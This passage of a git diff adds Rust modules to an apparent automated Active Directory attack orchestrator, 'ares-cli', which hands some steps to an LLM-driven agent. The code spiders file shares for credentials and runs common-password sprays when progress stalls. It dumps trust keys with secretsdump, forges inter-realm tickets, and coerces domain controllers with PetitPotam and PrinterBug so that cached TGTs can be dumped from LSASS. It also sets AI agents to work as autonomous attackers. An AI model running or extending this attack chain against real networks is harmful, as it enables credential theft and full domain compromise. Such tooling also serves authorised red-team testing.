crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Spiders readable shares for credentials using available creds. +/// Interval: 30s. Matches Python `_auto_share_spider`. +pub async fn auto_share_spider(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec<(String, String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + // Use first non-delegation credential to avoid burning auth budget + // on accounts reserved for S4U exploitation. 
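+            // Fallback order: first non-delegation, non-quarantined credential;
+            // otherwise credentials.first() so spidering still proceeds.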
+ let cred = match state + .credentials + .iter() + .find(|c| { + !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + state + .shares + .iter() + .filter(|s| { + let perms = s.permissions.to_uppercase(); + perms.contains("READ") && !s.name.to_uppercase().ends_with('$') + }) + .filter_map(|s| { + let dedup = format!("{}:{}:{}:{}", s.host, s.name, cred.username, cred.domain); + if state.is_processed(DEDUP_SPIDERED_SHARES, &dedup) { + None + } else { + Some((dedup, s.host.clone(), s.name.clone(), cred.clone())) + } + }) + .take(3) // limit batch size + .collect() + }; + + for (dedup_key, host, share, cred) in work { + match dispatcher.request_share_spider(&host, &share, &cred).await { + Ok(Some(task_id)) => { + debug!(task_id = %task_id, host = %host, share = %share, "Share spider dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SPIDERED_SHARES, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SPIDERED_SHARES, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch share spider"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/stall_detection.rs b/ares-cli/src/orchestrator/automation/stall_detection.rs new file mode 100644 index 00000000..cffd5768 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/stall_detection.rs @@ -0,0 +1,248 @@ +//! auto_stall_detection -- detect when the operation is stuck and take action. +//! +//! When no new credentials or hashes have been discovered for a configurable +//! period (default: 5 minutes), this automation triggers fallback actions: +//! +//! 1. Re-attempt password spray with discovered users +//! 2. Start responder + NTLM relay if not already running +//! 3. Re-run LDAP description search with all known creds +//! +//! This prevents the operation from idling when all easy wins are exhausted. + +use std::sync::Arc; +use std::time::{Duration, Instant}; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// How long without new discoveries before we consider the op stalled. +const STALL_THRESHOLD: Duration = Duration::from_secs(180); // 3 minutes + +/// Minimum interval between stall recovery actions. +const RECOVERY_COOLDOWN: Duration = Duration::from_secs(120); // 2 minutes + +/// Monitors for discovery stalls and triggers fallback actions. +/// Interval: 60s. +pub async fn auto_stall_detection( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(60)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + let start = Instant::now(); + let mut last_cred_count = 0usize; + let mut last_hash_count = 0usize; + let mut last_change = Instant::now(); + let mut last_recovery = Instant::now() - RECOVERY_COOLDOWN; // allow immediate first recovery + let mut recovery_attempts = 0u32; + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Don't check stall in the first 3 minutes (let initial recon complete) + if start.elapsed() < Duration::from_secs(180) { + continue; + } + + let (cred_count, hash_count, has_da, has_creds, has_users, has_dcs) = { + let state = dispatcher.state.read().await; + ( + state.credentials.len(), + state.hashes.len(), + state.has_domain_admin, + !state.credentials.is_empty(), + !state.users.is_empty(), + !state.domain_controllers.is_empty(), + ) + }; + + // Skip if we've achieved domain admin + if has_da { + continue; + } + + // Check if there has been progress + if cred_count > last_cred_count || hash_count > last_hash_count { + last_cred_count = cred_count; + last_hash_count = hash_count; + last_change = Instant::now(); + recovery_attempts = 0; // Reset on progress + continue; + } + + // Not stalled yet + if last_change.elapsed() < STALL_THRESHOLD { + continue; + } + + // Cooldown between recovery actions + if last_recovery.elapsed() < RECOVERY_COOLDOWN { + continue; + } + + // Cap recovery attempts (don't spam indefinitely) + if recovery_attempts >= 10 { + continue; + } + + info!( + stall_duration_secs = last_change.elapsed().as_secs(), + cred_count, + hash_count, + recovery_attempt = recovery_attempts + 1, + "Operation stall detected — triggering fallback actions" + ); + + last_recovery = Instant::now(); + recovery_attempts += 1; + + // --- Fallback 1: Password spray with discovered users --- + // Skip domains with pending delegation vulns — sprays lock delegation + // accounts and prevent S4U exploitation from succeeding. + if has_users && has_dcs { + let spray_work: Vec<(String, String)> = { + let state = dispatcher.state.read().await; + // Collect domains that have pending delegation vulns + let delegation_domains: std::collections::HashSet = state + .discovered_vulnerabilities + .values() + .filter(|v| { + let vt = v.vuln_type.to_lowercase(); + (vt == "constrained_delegation" || vt == "rbcd") + && !state.exploited_vulnerabilities.contains(&v.vuln_id) + }) + .filter_map(|v| { + v.details + .get("domain") + .or_else(|| v.details.get("Domain")) + .and_then(|d| d.as_str()) + .map(|d| d.to_lowercase()) + }) + .collect(); + state + .domain_controllers + .iter() + .filter(|(domain, _)| { + // Skip domains with pending delegation vulns + if delegation_domains.contains(&domain.to_lowercase()) { + return false; + } + // Use recovery_attempts in key so each round dispatches fresh sprays + let key = format!( + "stall_spray:{}:{}", + domain.to_lowercase(), + recovery_attempts + ); + !state.is_processed(DEDUP_PASSWORD_SPRAY, &key) + }) + .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) + .collect() + }; + + for (domain, dc_ip) in spray_work { + let payload = json!({ + "technique": "password_spray", + "target_ip": dc_ip, + "domain": domain, + "use_common_passwords": true, + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, 7) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, domain = %domain, "Stall recovery: password spray dispatched"); + let key = format!( + "stall_spray:{}:{}", + domain.to_lowercase(), + recovery_attempts + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PASSWORD_SPRAY, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_SPRAY, &key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Stall recovery: spray failed"), + } + } + } + + // 
--- Fallback 2: Low-hanging fruit (SYSVOL, GPP, LDAP descriptions, LAPS) --- + if has_creds && has_dcs { + let lhf_work: Vec<(String, String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + state + .credentials + .iter() + .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) + .filter_map(|cred| { + let cred_domain = cred.domain.to_lowercase(); + let key = format!( + "stall_lhf:{}:{}:{}", + cred_domain, + cred.username.to_lowercase(), + recovery_attempts + ); + if state.is_processed(DEDUP_EXPANSION_CREDS, &key) { + return None; + } + let dc_ip = state + .domain_controllers + .get(&cred_domain) + .cloned() + .or_else(|| { + let suffix = format!(".{cred_domain}"); + state + .domain_controllers + .iter() + .find(|(d, _)| d.ends_with(&suffix)) + .map(|(_, ip)| ip.clone()) + })?; + Some((key, dc_ip, cred_domain, cred.clone())) + }) + .take(2) + .collect() + }; + + for (key, dc_ip, domain, cred) in lhf_work { + match dispatcher + .request_low_hanging_fruit(&dc_ip, &domain, &cred, 6) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, domain = %domain, "Stall recovery: low-hanging fruit dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_EXPANSION_CREDS, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_EXPANSION_CREDS, &key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Stall recovery: low-hanging fruit failed"), + } + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/trust.rs b/ares-cli/src/orchestrator/automation/trust.rs new file mode 100644 index 00000000..3ff3b80f --- /dev/null +++ b/ares-cli/src/orchestrator/automation/trust.rs @@ -0,0 +1,448 @@ +//! auto_trust_follow -- trust enumeration, key extraction, and cross-domain attacks. +//! +//! Three-phase automation: +//! +//! 1. **Trust enumeration**: When DA is achieved, dispatch `enumerate_domain_trusts` +//! to discover trust relationships via LDAP. +//! 2. **Trust key extraction**: When trusts are known and DA creds are available, +//! dispatch secretsdump for trust account hashes (e.g. `FABRIKAM$`). +//! 3. **Trust follow**: When a trust account hash is found, dispatch inter-realm +//! ticket creation and secretsdump against the foreign DC. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Monitors for trust account hashes and dispatches cross-domain attacks. +/// Interval: 30s. +pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Auto-enumerate trusts when DA is achieved + { + let state = dispatcher.state.read().await; + if state.has_domain_admin { + // Dispatch trust enumeration for each known DC (once per domain) + let enum_work: Vec<(String, String, String)> = state + .domain_controllers + .iter() + .filter(|(domain, _)| { + let key = format!("trust_enum:{}", domain.to_lowercase()); + !state.is_processed(DEDUP_TRUST_FOLLOW, &key) + }) + .map(|(domain, dc_ip)| { + let key = format!("trust_enum:{}", domain.to_lowercase()); + (key, domain.clone(), dc_ip.clone()) + }) + .collect(); + drop(state); + + for (key, domain, dc_ip) in enum_work { + // Find a credential for this domain + let cred = { + let s = dispatcher.state.read().await; + s.credentials + .iter() + .find(|c| { + !c.password.is_empty() + && (c.domain.to_lowercase() == domain.to_lowercase() + || domain + .to_lowercase() + .ends_with(&format!(".{}", c.domain.to_lowercase()))) + }) + .cloned() + }; + + if let Some(cred) = cred { + let payload = json!({ + "techniques": ["enumerate_domain_trusts"], + "target_ip": dc_ip, + "domain": domain, + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + match dispatcher + .throttled_submit("recon", "recon", payload, 3) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %domain, + "Trust enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch trust enumeration"), + } + } + } + } + } + + // Extract trust keys for known cross-forest trusts + { + let state = dispatcher.state.read().await; + if state.has_domain_admin && !state.trusted_domains.is_empty() { + let extract_work: Vec<(String, String, String, String)> = state + .trusted_domains + .values() + .filter(|trust| trust.is_cross_forest()) + .filter_map(|trust| { + let key = format!("trust_extract:{}", trust.domain.to_lowercase()); + if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { + return None; + } + // Find a DC in the source domain (our domain, not the trust target) + // The trust domain is the foreign one; we need to secretsdump our DC + let source_domain = state.domains.first()?; + let dc_ip = state + .domain_controllers + .get(&source_domain.to_lowercase()) + .cloned()?; + Some((key, trust.flat_name.clone(), trust.domain.clone(), dc_ip)) + }) + .collect(); + let admin_cred = state + .credentials + .iter() + .find(|c| c.is_admin && !c.password.is_empty()) + .cloned(); + drop(state); + + if let Some(cred) = admin_cred { + for (key, flat_name, trust_domain, dc_ip) in extract_work { + // secretsdump -just-dc-user FABRIKAM$ to get trust key + let trust_account = format!("{}$", flat_name.to_uppercase()); + let payload = json!({ + "technique": "secretsdump", + "target_ip": dc_ip, + "domain": cred.domain, + "just_dc_user": trust_account, + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "reason": format!("extract trust key for {}", trust_domain), + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, 2) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + trust_account = %trust_account, + trust_domain = %trust_domain, + 
"Trust key extraction dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + } + Ok(None) => {} + Err(e) => { + warn!(err = %e, "Failed to dispatch trust key extraction") + } + } + } + } + } + } + + // Follow trust keys (inter-realm ticket + foreign secretsdump) + let (work, admin_cred_phase3): ( + Vec, + Option, + ) = { + let state = dispatcher.state.read().await; + + // Skip if no domain admin yet — trust extraction requires DA-level creds + if !state.has_domain_admin { + continue; + } + + // Build lookup of known trust flat names → TrustInfo so we only + // process actual trust account hashes, not random machine accounts. + let trust_by_flat: std::collections::HashMap = + state + .trusted_domains + .values() + .map(|t| (t.flat_name.to_uppercase(), t)) + .collect(); + + let admin_cred = state + .credentials + .iter() + .find(|c| c.is_admin && !c.password.is_empty()) + .cloned(); + + let items = state + .hashes + .iter() + .filter_map(|hash| { + if !hash.username.ends_with('$') { + return None; + } + + // Only process hashes that match a known trust account + let netbios = hash.username.trim_end_matches('$').to_uppercase(); + let trust = trust_by_flat.get(&netbios)?; + + // Resolve source domain — fall back to first known domain + // when secretsdump output lacks domain prefix for machine accounts + let source_domain = if hash.domain.is_empty() { + state.domains.first().cloned().unwrap_or_default() + } else { + hash.domain.clone() + }; + if source_domain.is_empty() { + return None; + } + + let dedup_key = format!( + "trust_follow:{}:{}", + source_domain.to_lowercase(), + hash.username.to_lowercase() + ); + if state.is_processed(DEDUP_TRUST_FOLLOW, &dedup_key) { + return None; + } + + // Use the FQDN from the trust relationship — never fall back + // to bare NetBIOS name which produces invalid domain strings. 
+ let target_domain = trust.domain.clone(); + + let target_dc_ip = state + .domain_controllers + .get(&target_domain.to_lowercase()) + .cloned(); + + let source_domain_sid = state + .domain_sids + .get(&source_domain.to_lowercase()) + .cloned(); + let target_domain_sid = state + .domain_sids + .get(&target_domain.to_lowercase()) + .cloned(); + + let source_dc_ip = state + .domain_controllers + .get(&source_domain.to_lowercase()) + .cloned(); + + Some(TrustFollowWork { + dedup_key, + hash: hash.clone(), + source_domain, + target_domain, + target_dc_ip, + source_domain_sid, + target_domain_sid, + source_dc_ip, + }) + }) + .collect(); + + (items, admin_cred) + }; + + for item in work { + let vuln_id = format!( + "forest_trust_{}_{}", + item.source_domain.to_lowercase(), + item.target_domain.to_lowercase() + ); + let trust_target = item + .target_dc_ip + .clone() + .unwrap_or_else(|| item.target_domain.clone()); + { + let mut details = std::collections::HashMap::new(); + details.insert( + "source_domain".into(), + serde_json::Value::String(item.source_domain.clone()), + ); + details.insert( + "target_domain".into(), + serde_json::Value::String(item.target_domain.clone()), + ); + details.insert( + "trust_account".into(), + serde_json::Value::String(item.hash.username.clone()), + ); + details.insert( + "note".into(), + serde_json::Value::String(format!( + "Forest trust escalation via {} trust key — inter-realm ticket + secretsdump", + item.hash.username + )), + ); + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: vuln_id.clone(), + vuln_type: "forest_trust_escalation".to_string(), + target: trust_target, + discovered_by: "trust_automation".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 1, + }; + let _ = dispatcher + .state + .publish_vulnerability(&dispatcher.queue, vuln) + .await; + } + + // 1. Dispatch inter-realm ticket creation. 
+ // Use field names that match the tool and prompt expectations: + // - `vuln_type` routes to generate_trust_key_prompt + // - `source_sid`/`target_sid` match create_inter_realm_ticket tool + // - `trusted_domain` is read by the trust prompt + // - Include admin creds + dc_ip so the LLM can call get_sid if SIDs are missing + let mut ticket_payload = json!({ + "technique": "create_inter_realm_ticket", + "vuln_type": "cross_forest", + "domain": item.source_domain, + "trusted_domain": item.target_domain, + "target_domain": item.target_domain, + "target": item.target_dc_ip.as_deref().unwrap_or(&item.target_domain), + "trust_key": item.hash.hash_value, + "trust_account": item.hash.username, + "vuln_id": &vuln_id, + }); + if let Some(ref sid) = item.source_domain_sid { + ticket_payload["source_sid"] = json!(sid); + } + if let Some(ref sid) = item.target_domain_sid { + ticket_payload["target_sid"] = json!(sid); + } + if let Some(ref aes) = item.hash.aes_key { + ticket_payload["aes_key"] = json!(aes); + } + if let Some(ref dc_ip) = item.source_dc_ip { + ticket_payload["dc_ip"] = json!(dc_ip); + } + if let Some(ref cred) = admin_cred_phase3 { + ticket_payload["username"] = json!(cred.username); + ticket_payload["password"] = json!(cred.password); + } + + match dispatcher + .throttled_submit("exploit", "privesc", ticket_payload, 1) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + trust_account = %item.hash.username, + source_domain = %item.source_domain, + target_domain = %item.target_domain, + has_source_sid = item.source_domain_sid.is_some(), + has_target_sid = item.target_domain_sid.is_some(), + "Inter-realm ticket task dispatched" + ); + let _ = dispatcher + .state + .mark_exploited(&dispatcher.queue, &vuln_id) + .await; + } + Ok(None) => { + debug!("Inter-realm ticket deferred by throttler"); + continue; + } + Err(e) => { + warn!(err = %e, "Failed to dispatch inter-realm ticket"); + continue; + } + } + + // 2. If we know the target DC, dispatch secretsdump against it + if let Some(ref dc_ip) = item.target_dc_ip { + let sd_payload = json!({ + "technique": "secretsdump", + "target_ip": dc_ip, + "domain": item.target_domain, + "trust_account": item.hash.username, + "trust_key": item.hash.hash_value, + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", sd_payload, 2) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target_dc = %dc_ip, + target_domain = %item.target_domain, + "Cross-domain secretsdump dispatched" + ); + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch cross-domain secretsdump"), + } + } + + // Mark as processed + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key) + .await; + } + } +} + +struct TrustFollowWork { + dedup_key: String, + hash: ares_core::models::Hash, + source_domain: String, + target_domain: String, + target_dc_ip: Option, + source_domain_sid: Option, + target_domain_sid: Option, + source_dc_ip: Option, +} diff --git a/ares-cli/src/orchestrator/automation/unconstrained.rs b/ares-cli/src/orchestrator/automation/unconstrained.rs new file mode 100644 index 00000000..baa6845d --- /dev/null +++ b/ares-cli/src/orchestrator/automation/unconstrained.rs @@ -0,0 +1,385 @@ +//! auto_unconstrained_exploitation -- coerce-and-dump for unconstrained delegation. +//! +//! 
When a machine account with unconstrained delegation is discovered (e.g.
+//! `DC02$`), this automation orchestrates the full attack chain:
+//!
+//! 1. **Coerce** a DC to authenticate to the unconstrained delegation host
+//!    (PetitPotam / PrinterBug). The DC's TGT is cached in LSASS on that host.
+//! 2. **Dump** cached TGTs from the host's LSASS memory via lsassy.
+//! 3. **Chain** — result_processing's `auto_chain_s4u_secretsdump` picks up any
+//!    `.ccache` ticket and dispatches secretsdump automatically.
+//!
+//! User accounts with unconstrained delegation (e.g. `sarah.connor`) are left to
+//! the LLM-driven exploit path since we can't determine the target host.
+
+use std::collections::HashMap;
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tokio::time::Instant;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::DEDUP_COERCED_DCS;
+
+/// Delay after coercion before dispatching the first TGT dump, giving the
+/// coerced authentication time to complete and the TGT to land in LSASS.
+const COERCE_TO_DUMP_DELAY: Duration = Duration::from_secs(15);
+
+/// Maximum TGT dump attempts per vulnerability before giving up.
+const MAX_DUMP_ATTEMPTS: u32 = 3;
+
+/// Delay between successive dump retries for the same vuln.
+const DUMP_RETRY_DELAY: Duration = Duration::from_secs(60);
+
+// -----------------------------------------------------------------------
+// Phase tracking (in-memory only — intentionally not persisted so restarts
+// re-trigger the chain, since cached TGTs expire quickly).
+// -----------------------------------------------------------------------
+
+#[derive(Debug)]
+struct PhaseState {
+    coercion_dispatched_at: Option<Instant>,
+    dump_attempts: u32,
+    last_dump_at: Option<Instant>,
+    completed: bool,
+}
+
+/// Monitors for unconstrained delegation vulns and orchestrates coerce → dump.
+/// Interval: 20s. Wakes on delegation_notify and credential_access_notify.
+pub async fn auto_unconstrained_exploitation(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+    let deleg_notify = dispatcher.delegation_notify.clone();
+    let cred_notify = dispatcher.credential_access_notify.clone();
+    let mut interval = tokio::time::interval(Duration::from_secs(20));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    let mut phases: HashMap<String, PhaseState> = HashMap::new();
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = deleg_notify.notified() => {},
+            _ = cred_notify.notified() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        let work: Vec<UnconstrainedWork> = {
+            let state = dispatcher.state.read().await;
+
+            if state.has_domain_admin {
+                continue;
+            }
+
+            state
+                .discovered_vulnerabilities
+                .values()
+                .filter_map(|vuln| {
+                    if vuln.vuln_type.to_lowercase() != "unconstrained_delegation" {
+                        return None;
+                    }
+                    if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+                        return None;
+                    }
+
+                    let account_name = vuln
+                        .details
+                        .get("account_name")
+                        .and_then(|v| v.as_str())?
+                        .to_string();
+
+                    let domain = vuln
+                        .details
+                        .get("domain")
+                        .and_then(|v| v.as_str())
+                        .unwrap_or("")
+                        .to_string();
+
+                    // Skip completed vulns
+                    if phases.get(&vuln.vuln_id).is_some_and(|p| p.completed) {
+                        return None;
+                    }
+
+                    // Only automate machine accounts — we can resolve hostname → IP.
+                    // User accounts (sarah.connor) go through the LLM exploit path.
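+                    // e.g. "DC02$" is handled here; "sarah.connor" falls through
+                    // to the LLM path (both examples from the module docs above).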
+ if !account_name.ends_with('$') { + return None; + } + + // Resolve machine hostname → IP from discovered hosts. + // DC02$ → look for host with hostname starting with "dc02". + let hostname_prefix = account_name.trim_end_matches('$').to_lowercase(); + let host_ip = state.hosts.iter().find_map(|h| { + let h_lower = h.hostname.to_lowercase(); + if h_lower == hostname_prefix + || h_lower.starts_with(&format!("{hostname_prefix}.")) + { + Some(h.ip.clone()) + } else { + None + } + })?; + + // Find a DC in the same domain — this is what we coerce FROM. + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + // Find any non-quarantined credential for this domain. + let credential = state + .credentials + .iter() + .find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned(); + + if credential.is_none() { + debug!( + vuln_id = %vuln.vuln_id, + "Unconstrained: no credential available yet" + ); + return None; + } + + // Determine action based on current phase. + let phase = phases.get(&vuln.vuln_id); + + // If auto_coercion already coerced this DC, skip straight to dump. + let already_coerced = dc_ip + .as_ref() + .is_some_and(|ip| state.is_processed(DEDUP_COERCED_DCS, ip)); + + let action = match phase { + // No phase yet — dispatch coercion (or skip if already coerced). + None if already_coerced => Action::Dump, + None if dc_ip.is_some() => Action::Coerce, + None => { + debug!( + vuln_id = %vuln.vuln_id, + "Unconstrained: no DC found for coercion" + ); + return None; + } + + // Coercion dispatched, waiting for delay before dump. + Some(p) + if p.coercion_dispatched_at.is_some() + && p.dump_attempts == 0 + && p.coercion_dispatched_at.unwrap().elapsed() + >= COERCE_TO_DUMP_DELAY => + { + Action::Dump + } + + // Dump retry — previous attempt didn't yield TGTs. + Some(p) + if p.dump_attempts > 0 + && p.dump_attempts < MAX_DUMP_ATTEMPTS + && p.last_dump_at + .is_none_or(|t| t.elapsed() >= DUMP_RETRY_DELAY) => + { + Action::Dump + } + + _ => return None, + }; + + Some(UnconstrainedWork { + vuln_id: vuln.vuln_id.clone(), + account_name, + domain, + host_ip, + dc_ip, + credential, + action, + }) + }) + .collect() + }; + + for item in work { + match item.action { + Action::Coerce => { + let dc_ip = match &item.dc_ip { + Some(ip) => ip.clone(), + None => continue, + }; + + let cred = match &item.credential { + Some(c) => c, + None => continue, + }; + + // Coerce DC → unconstrained host. The DC's TGT is cached + // in the unconstrained host's LSASS. 
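+                    // Resulting chain (sketch, per the module docs): the DC at
+                    // dc_ip authenticates to host_ip via PetitPotam/PrinterBug,
+                    // its TGT lands in LSASS there, and Action::Dump extracts it.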
+ let payload = json!({ + "target_ip": dc_ip, + "listener_ip": item.host_ip, + "techniques": ["petitpotam", "printerbug"], + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "reason": "unconstrained_delegation_coercion", + }); + + match dispatcher + .throttled_submit("coercion", "coercion", payload, 8) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + vuln_id = %item.vuln_id, + account = %item.account_name, + dc = %dc_ip, + listener = %item.host_ip, + "Unconstrained delegation: coercion dispatched (DC → host)" + ); + phases.insert( + item.vuln_id.clone(), + PhaseState { + coercion_dispatched_at: Some(Instant::now()), + dump_attempts: 0, + last_dump_at: None, + completed: false, + }, + ); + } + Ok(None) => { + debug!(vuln_id = %item.vuln_id, "Coercion deferred by throttler"); + } + Err(e) => { + warn!( + err = %e, + vuln_id = %item.vuln_id, + "Failed to dispatch unconstrained coercion" + ); + } + } + } + + Action::Dump => { + let cred = match &item.credential { + Some(c) => c, + None => continue, + }; + + let payload = json!({ + "technique": "unconstrained_tgt_dump", + "vuln_type": "unconstrained_delegation", + "vuln_id": item.vuln_id, + "target": item.host_ip, + "target_ip": item.host_ip, + "domain": item.domain, + "account_name": item.account_name, + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + match dispatcher + .throttled_submit("exploit", "privesc", payload, 9) + .await + { + Ok(Some(task_id)) => { + let phase = phases.entry(item.vuln_id.clone()).or_insert(PhaseState { + coercion_dispatched_at: None, + dump_attempts: 0, + last_dump_at: None, + completed: false, + }); + phase.dump_attempts += 1; + phase.last_dump_at = Some(Instant::now()); + + info!( + task_id = %task_id, + vuln_id = %item.vuln_id, + attempt = phase.dump_attempts, + target = %item.host_ip, + "Unconstrained delegation: TGT dump dispatched" + ); + + if phase.dump_attempts >= MAX_DUMP_ATTEMPTS { + phase.completed = true; + debug!( + vuln_id = %item.vuln_id, + "Unconstrained delegation: max dump attempts reached" + ); + } + } + Ok(None) => { + debug!(vuln_id = %item.vuln_id, "TGT dump deferred by throttler"); + } + Err(e) => { + warn!( + err = %e, + vuln_id = %item.vuln_id, + "Failed to dispatch TGT dump" + ); + } + } + } + } + } + } +} + +#[derive(Debug)] +enum Action { + Coerce, + Dump, +} + +struct UnconstrainedWork { + vuln_id: String, + account_name: String, + domain: String, + host_ip: String, + dc_ip: Option, + credential: Option, + action: Action, +} + +#[cfg(test)] +mod tests { + #[test] + fn test_hostname_resolution_machine_account() { + // DC02$ → "dc02" + let account = "DC02$"; + let prefix = account.trim_end_matches('$').to_lowercase(); + assert_eq!(prefix, "dc02"); + + // Should match "dc02.child.contoso.local" + let hostname = "dc02.child.contoso.local"; + let h_lower = hostname.to_lowercase(); + assert!(h_lower == prefix || h_lower.starts_with(&format!("{prefix}."))); + } + + #[test] + fn test_hostname_resolution_short_name() { + let account = "DC01$"; + let prefix = account.trim_end_matches('$').to_lowercase(); + assert_eq!(prefix, "dc01"); + + // Should match "dc01" + assert!("dc01" == prefix); + // Should match "dc01.contoso.local" + assert!("dc01.contoso.local".starts_with(&format!("{prefix}."))); + // Should NOT match "dc011.contoso.local" + assert!(!"dc011.contoso.local".starts_with(&format!("{prefix}."))); + } +} diff --git 
a/ares-cli/src/orchestrator/automation_spawner.rs b/ares-cli/src/orchestrator/automation_spawner.rs new file mode 100644 index 00000000..c02590eb --- /dev/null +++ b/ares-cli/src/orchestrator/automation_spawner.rs @@ -0,0 +1,47 @@ +use std::sync::Arc; + +use tokio::sync::watch; +use tracing::info; + +use crate::orchestrator::automation; +use crate::orchestrator::dispatcher::Dispatcher; + +/// Spawn all automation background tasks. Returns their JoinHandles. +pub(crate) fn spawn_automation_tasks( + dispatcher: Arc, + shutdown_rx: watch::Receiver, +) -> Vec> { + let mut handles = Vec::new(); + + macro_rules! spawn_auto { + ($name:ident) => {{ + let d = dispatcher.clone(); + let s = shutdown_rx.clone(); + handles.push(tokio::spawn(async move { + automation::$name(d, s).await; + })); + }}; + } + + spawn_auto!(auto_crack_dispatch); + spawn_auto!(auto_mssql_detection); + spawn_auto!(auto_adcs_enumeration); + spawn_auto!(auto_share_enumeration); + spawn_auto!(auto_share_spider); + spawn_auto!(auto_bloodhound); + spawn_auto!(auto_delegation_enumeration); + spawn_auto!(auto_coercion); + spawn_auto!(auto_local_admin_secretsdump); + spawn_auto!(auto_credential_access); + spawn_auto!(auto_credential_expansion); + spawn_auto!(auto_golden_ticket); + spawn_auto!(auto_acl_chain_follow); + spawn_auto!(auto_trust_follow); + spawn_auto!(auto_s4u_exploitation); + spawn_auto!(auto_gmsa_extraction); + spawn_auto!(auto_unconstrained_exploitation); + spawn_auto!(auto_stall_detection); + + info!(count = handles.len(), "Automation tasks spawned"); + handles +} diff --git a/ares-cli/src/orchestrator/blue/auto_submit.rs b/ares-cli/src/orchestrator/blue/auto_submit.rs new file mode 100644 index 00000000..cf64061d --- /dev/null +++ b/ares-cli/src/orchestrator/blue/auto_submit.rs @@ -0,0 +1,246 @@ +//! Auto-submit blue team investigations from red team operation state. 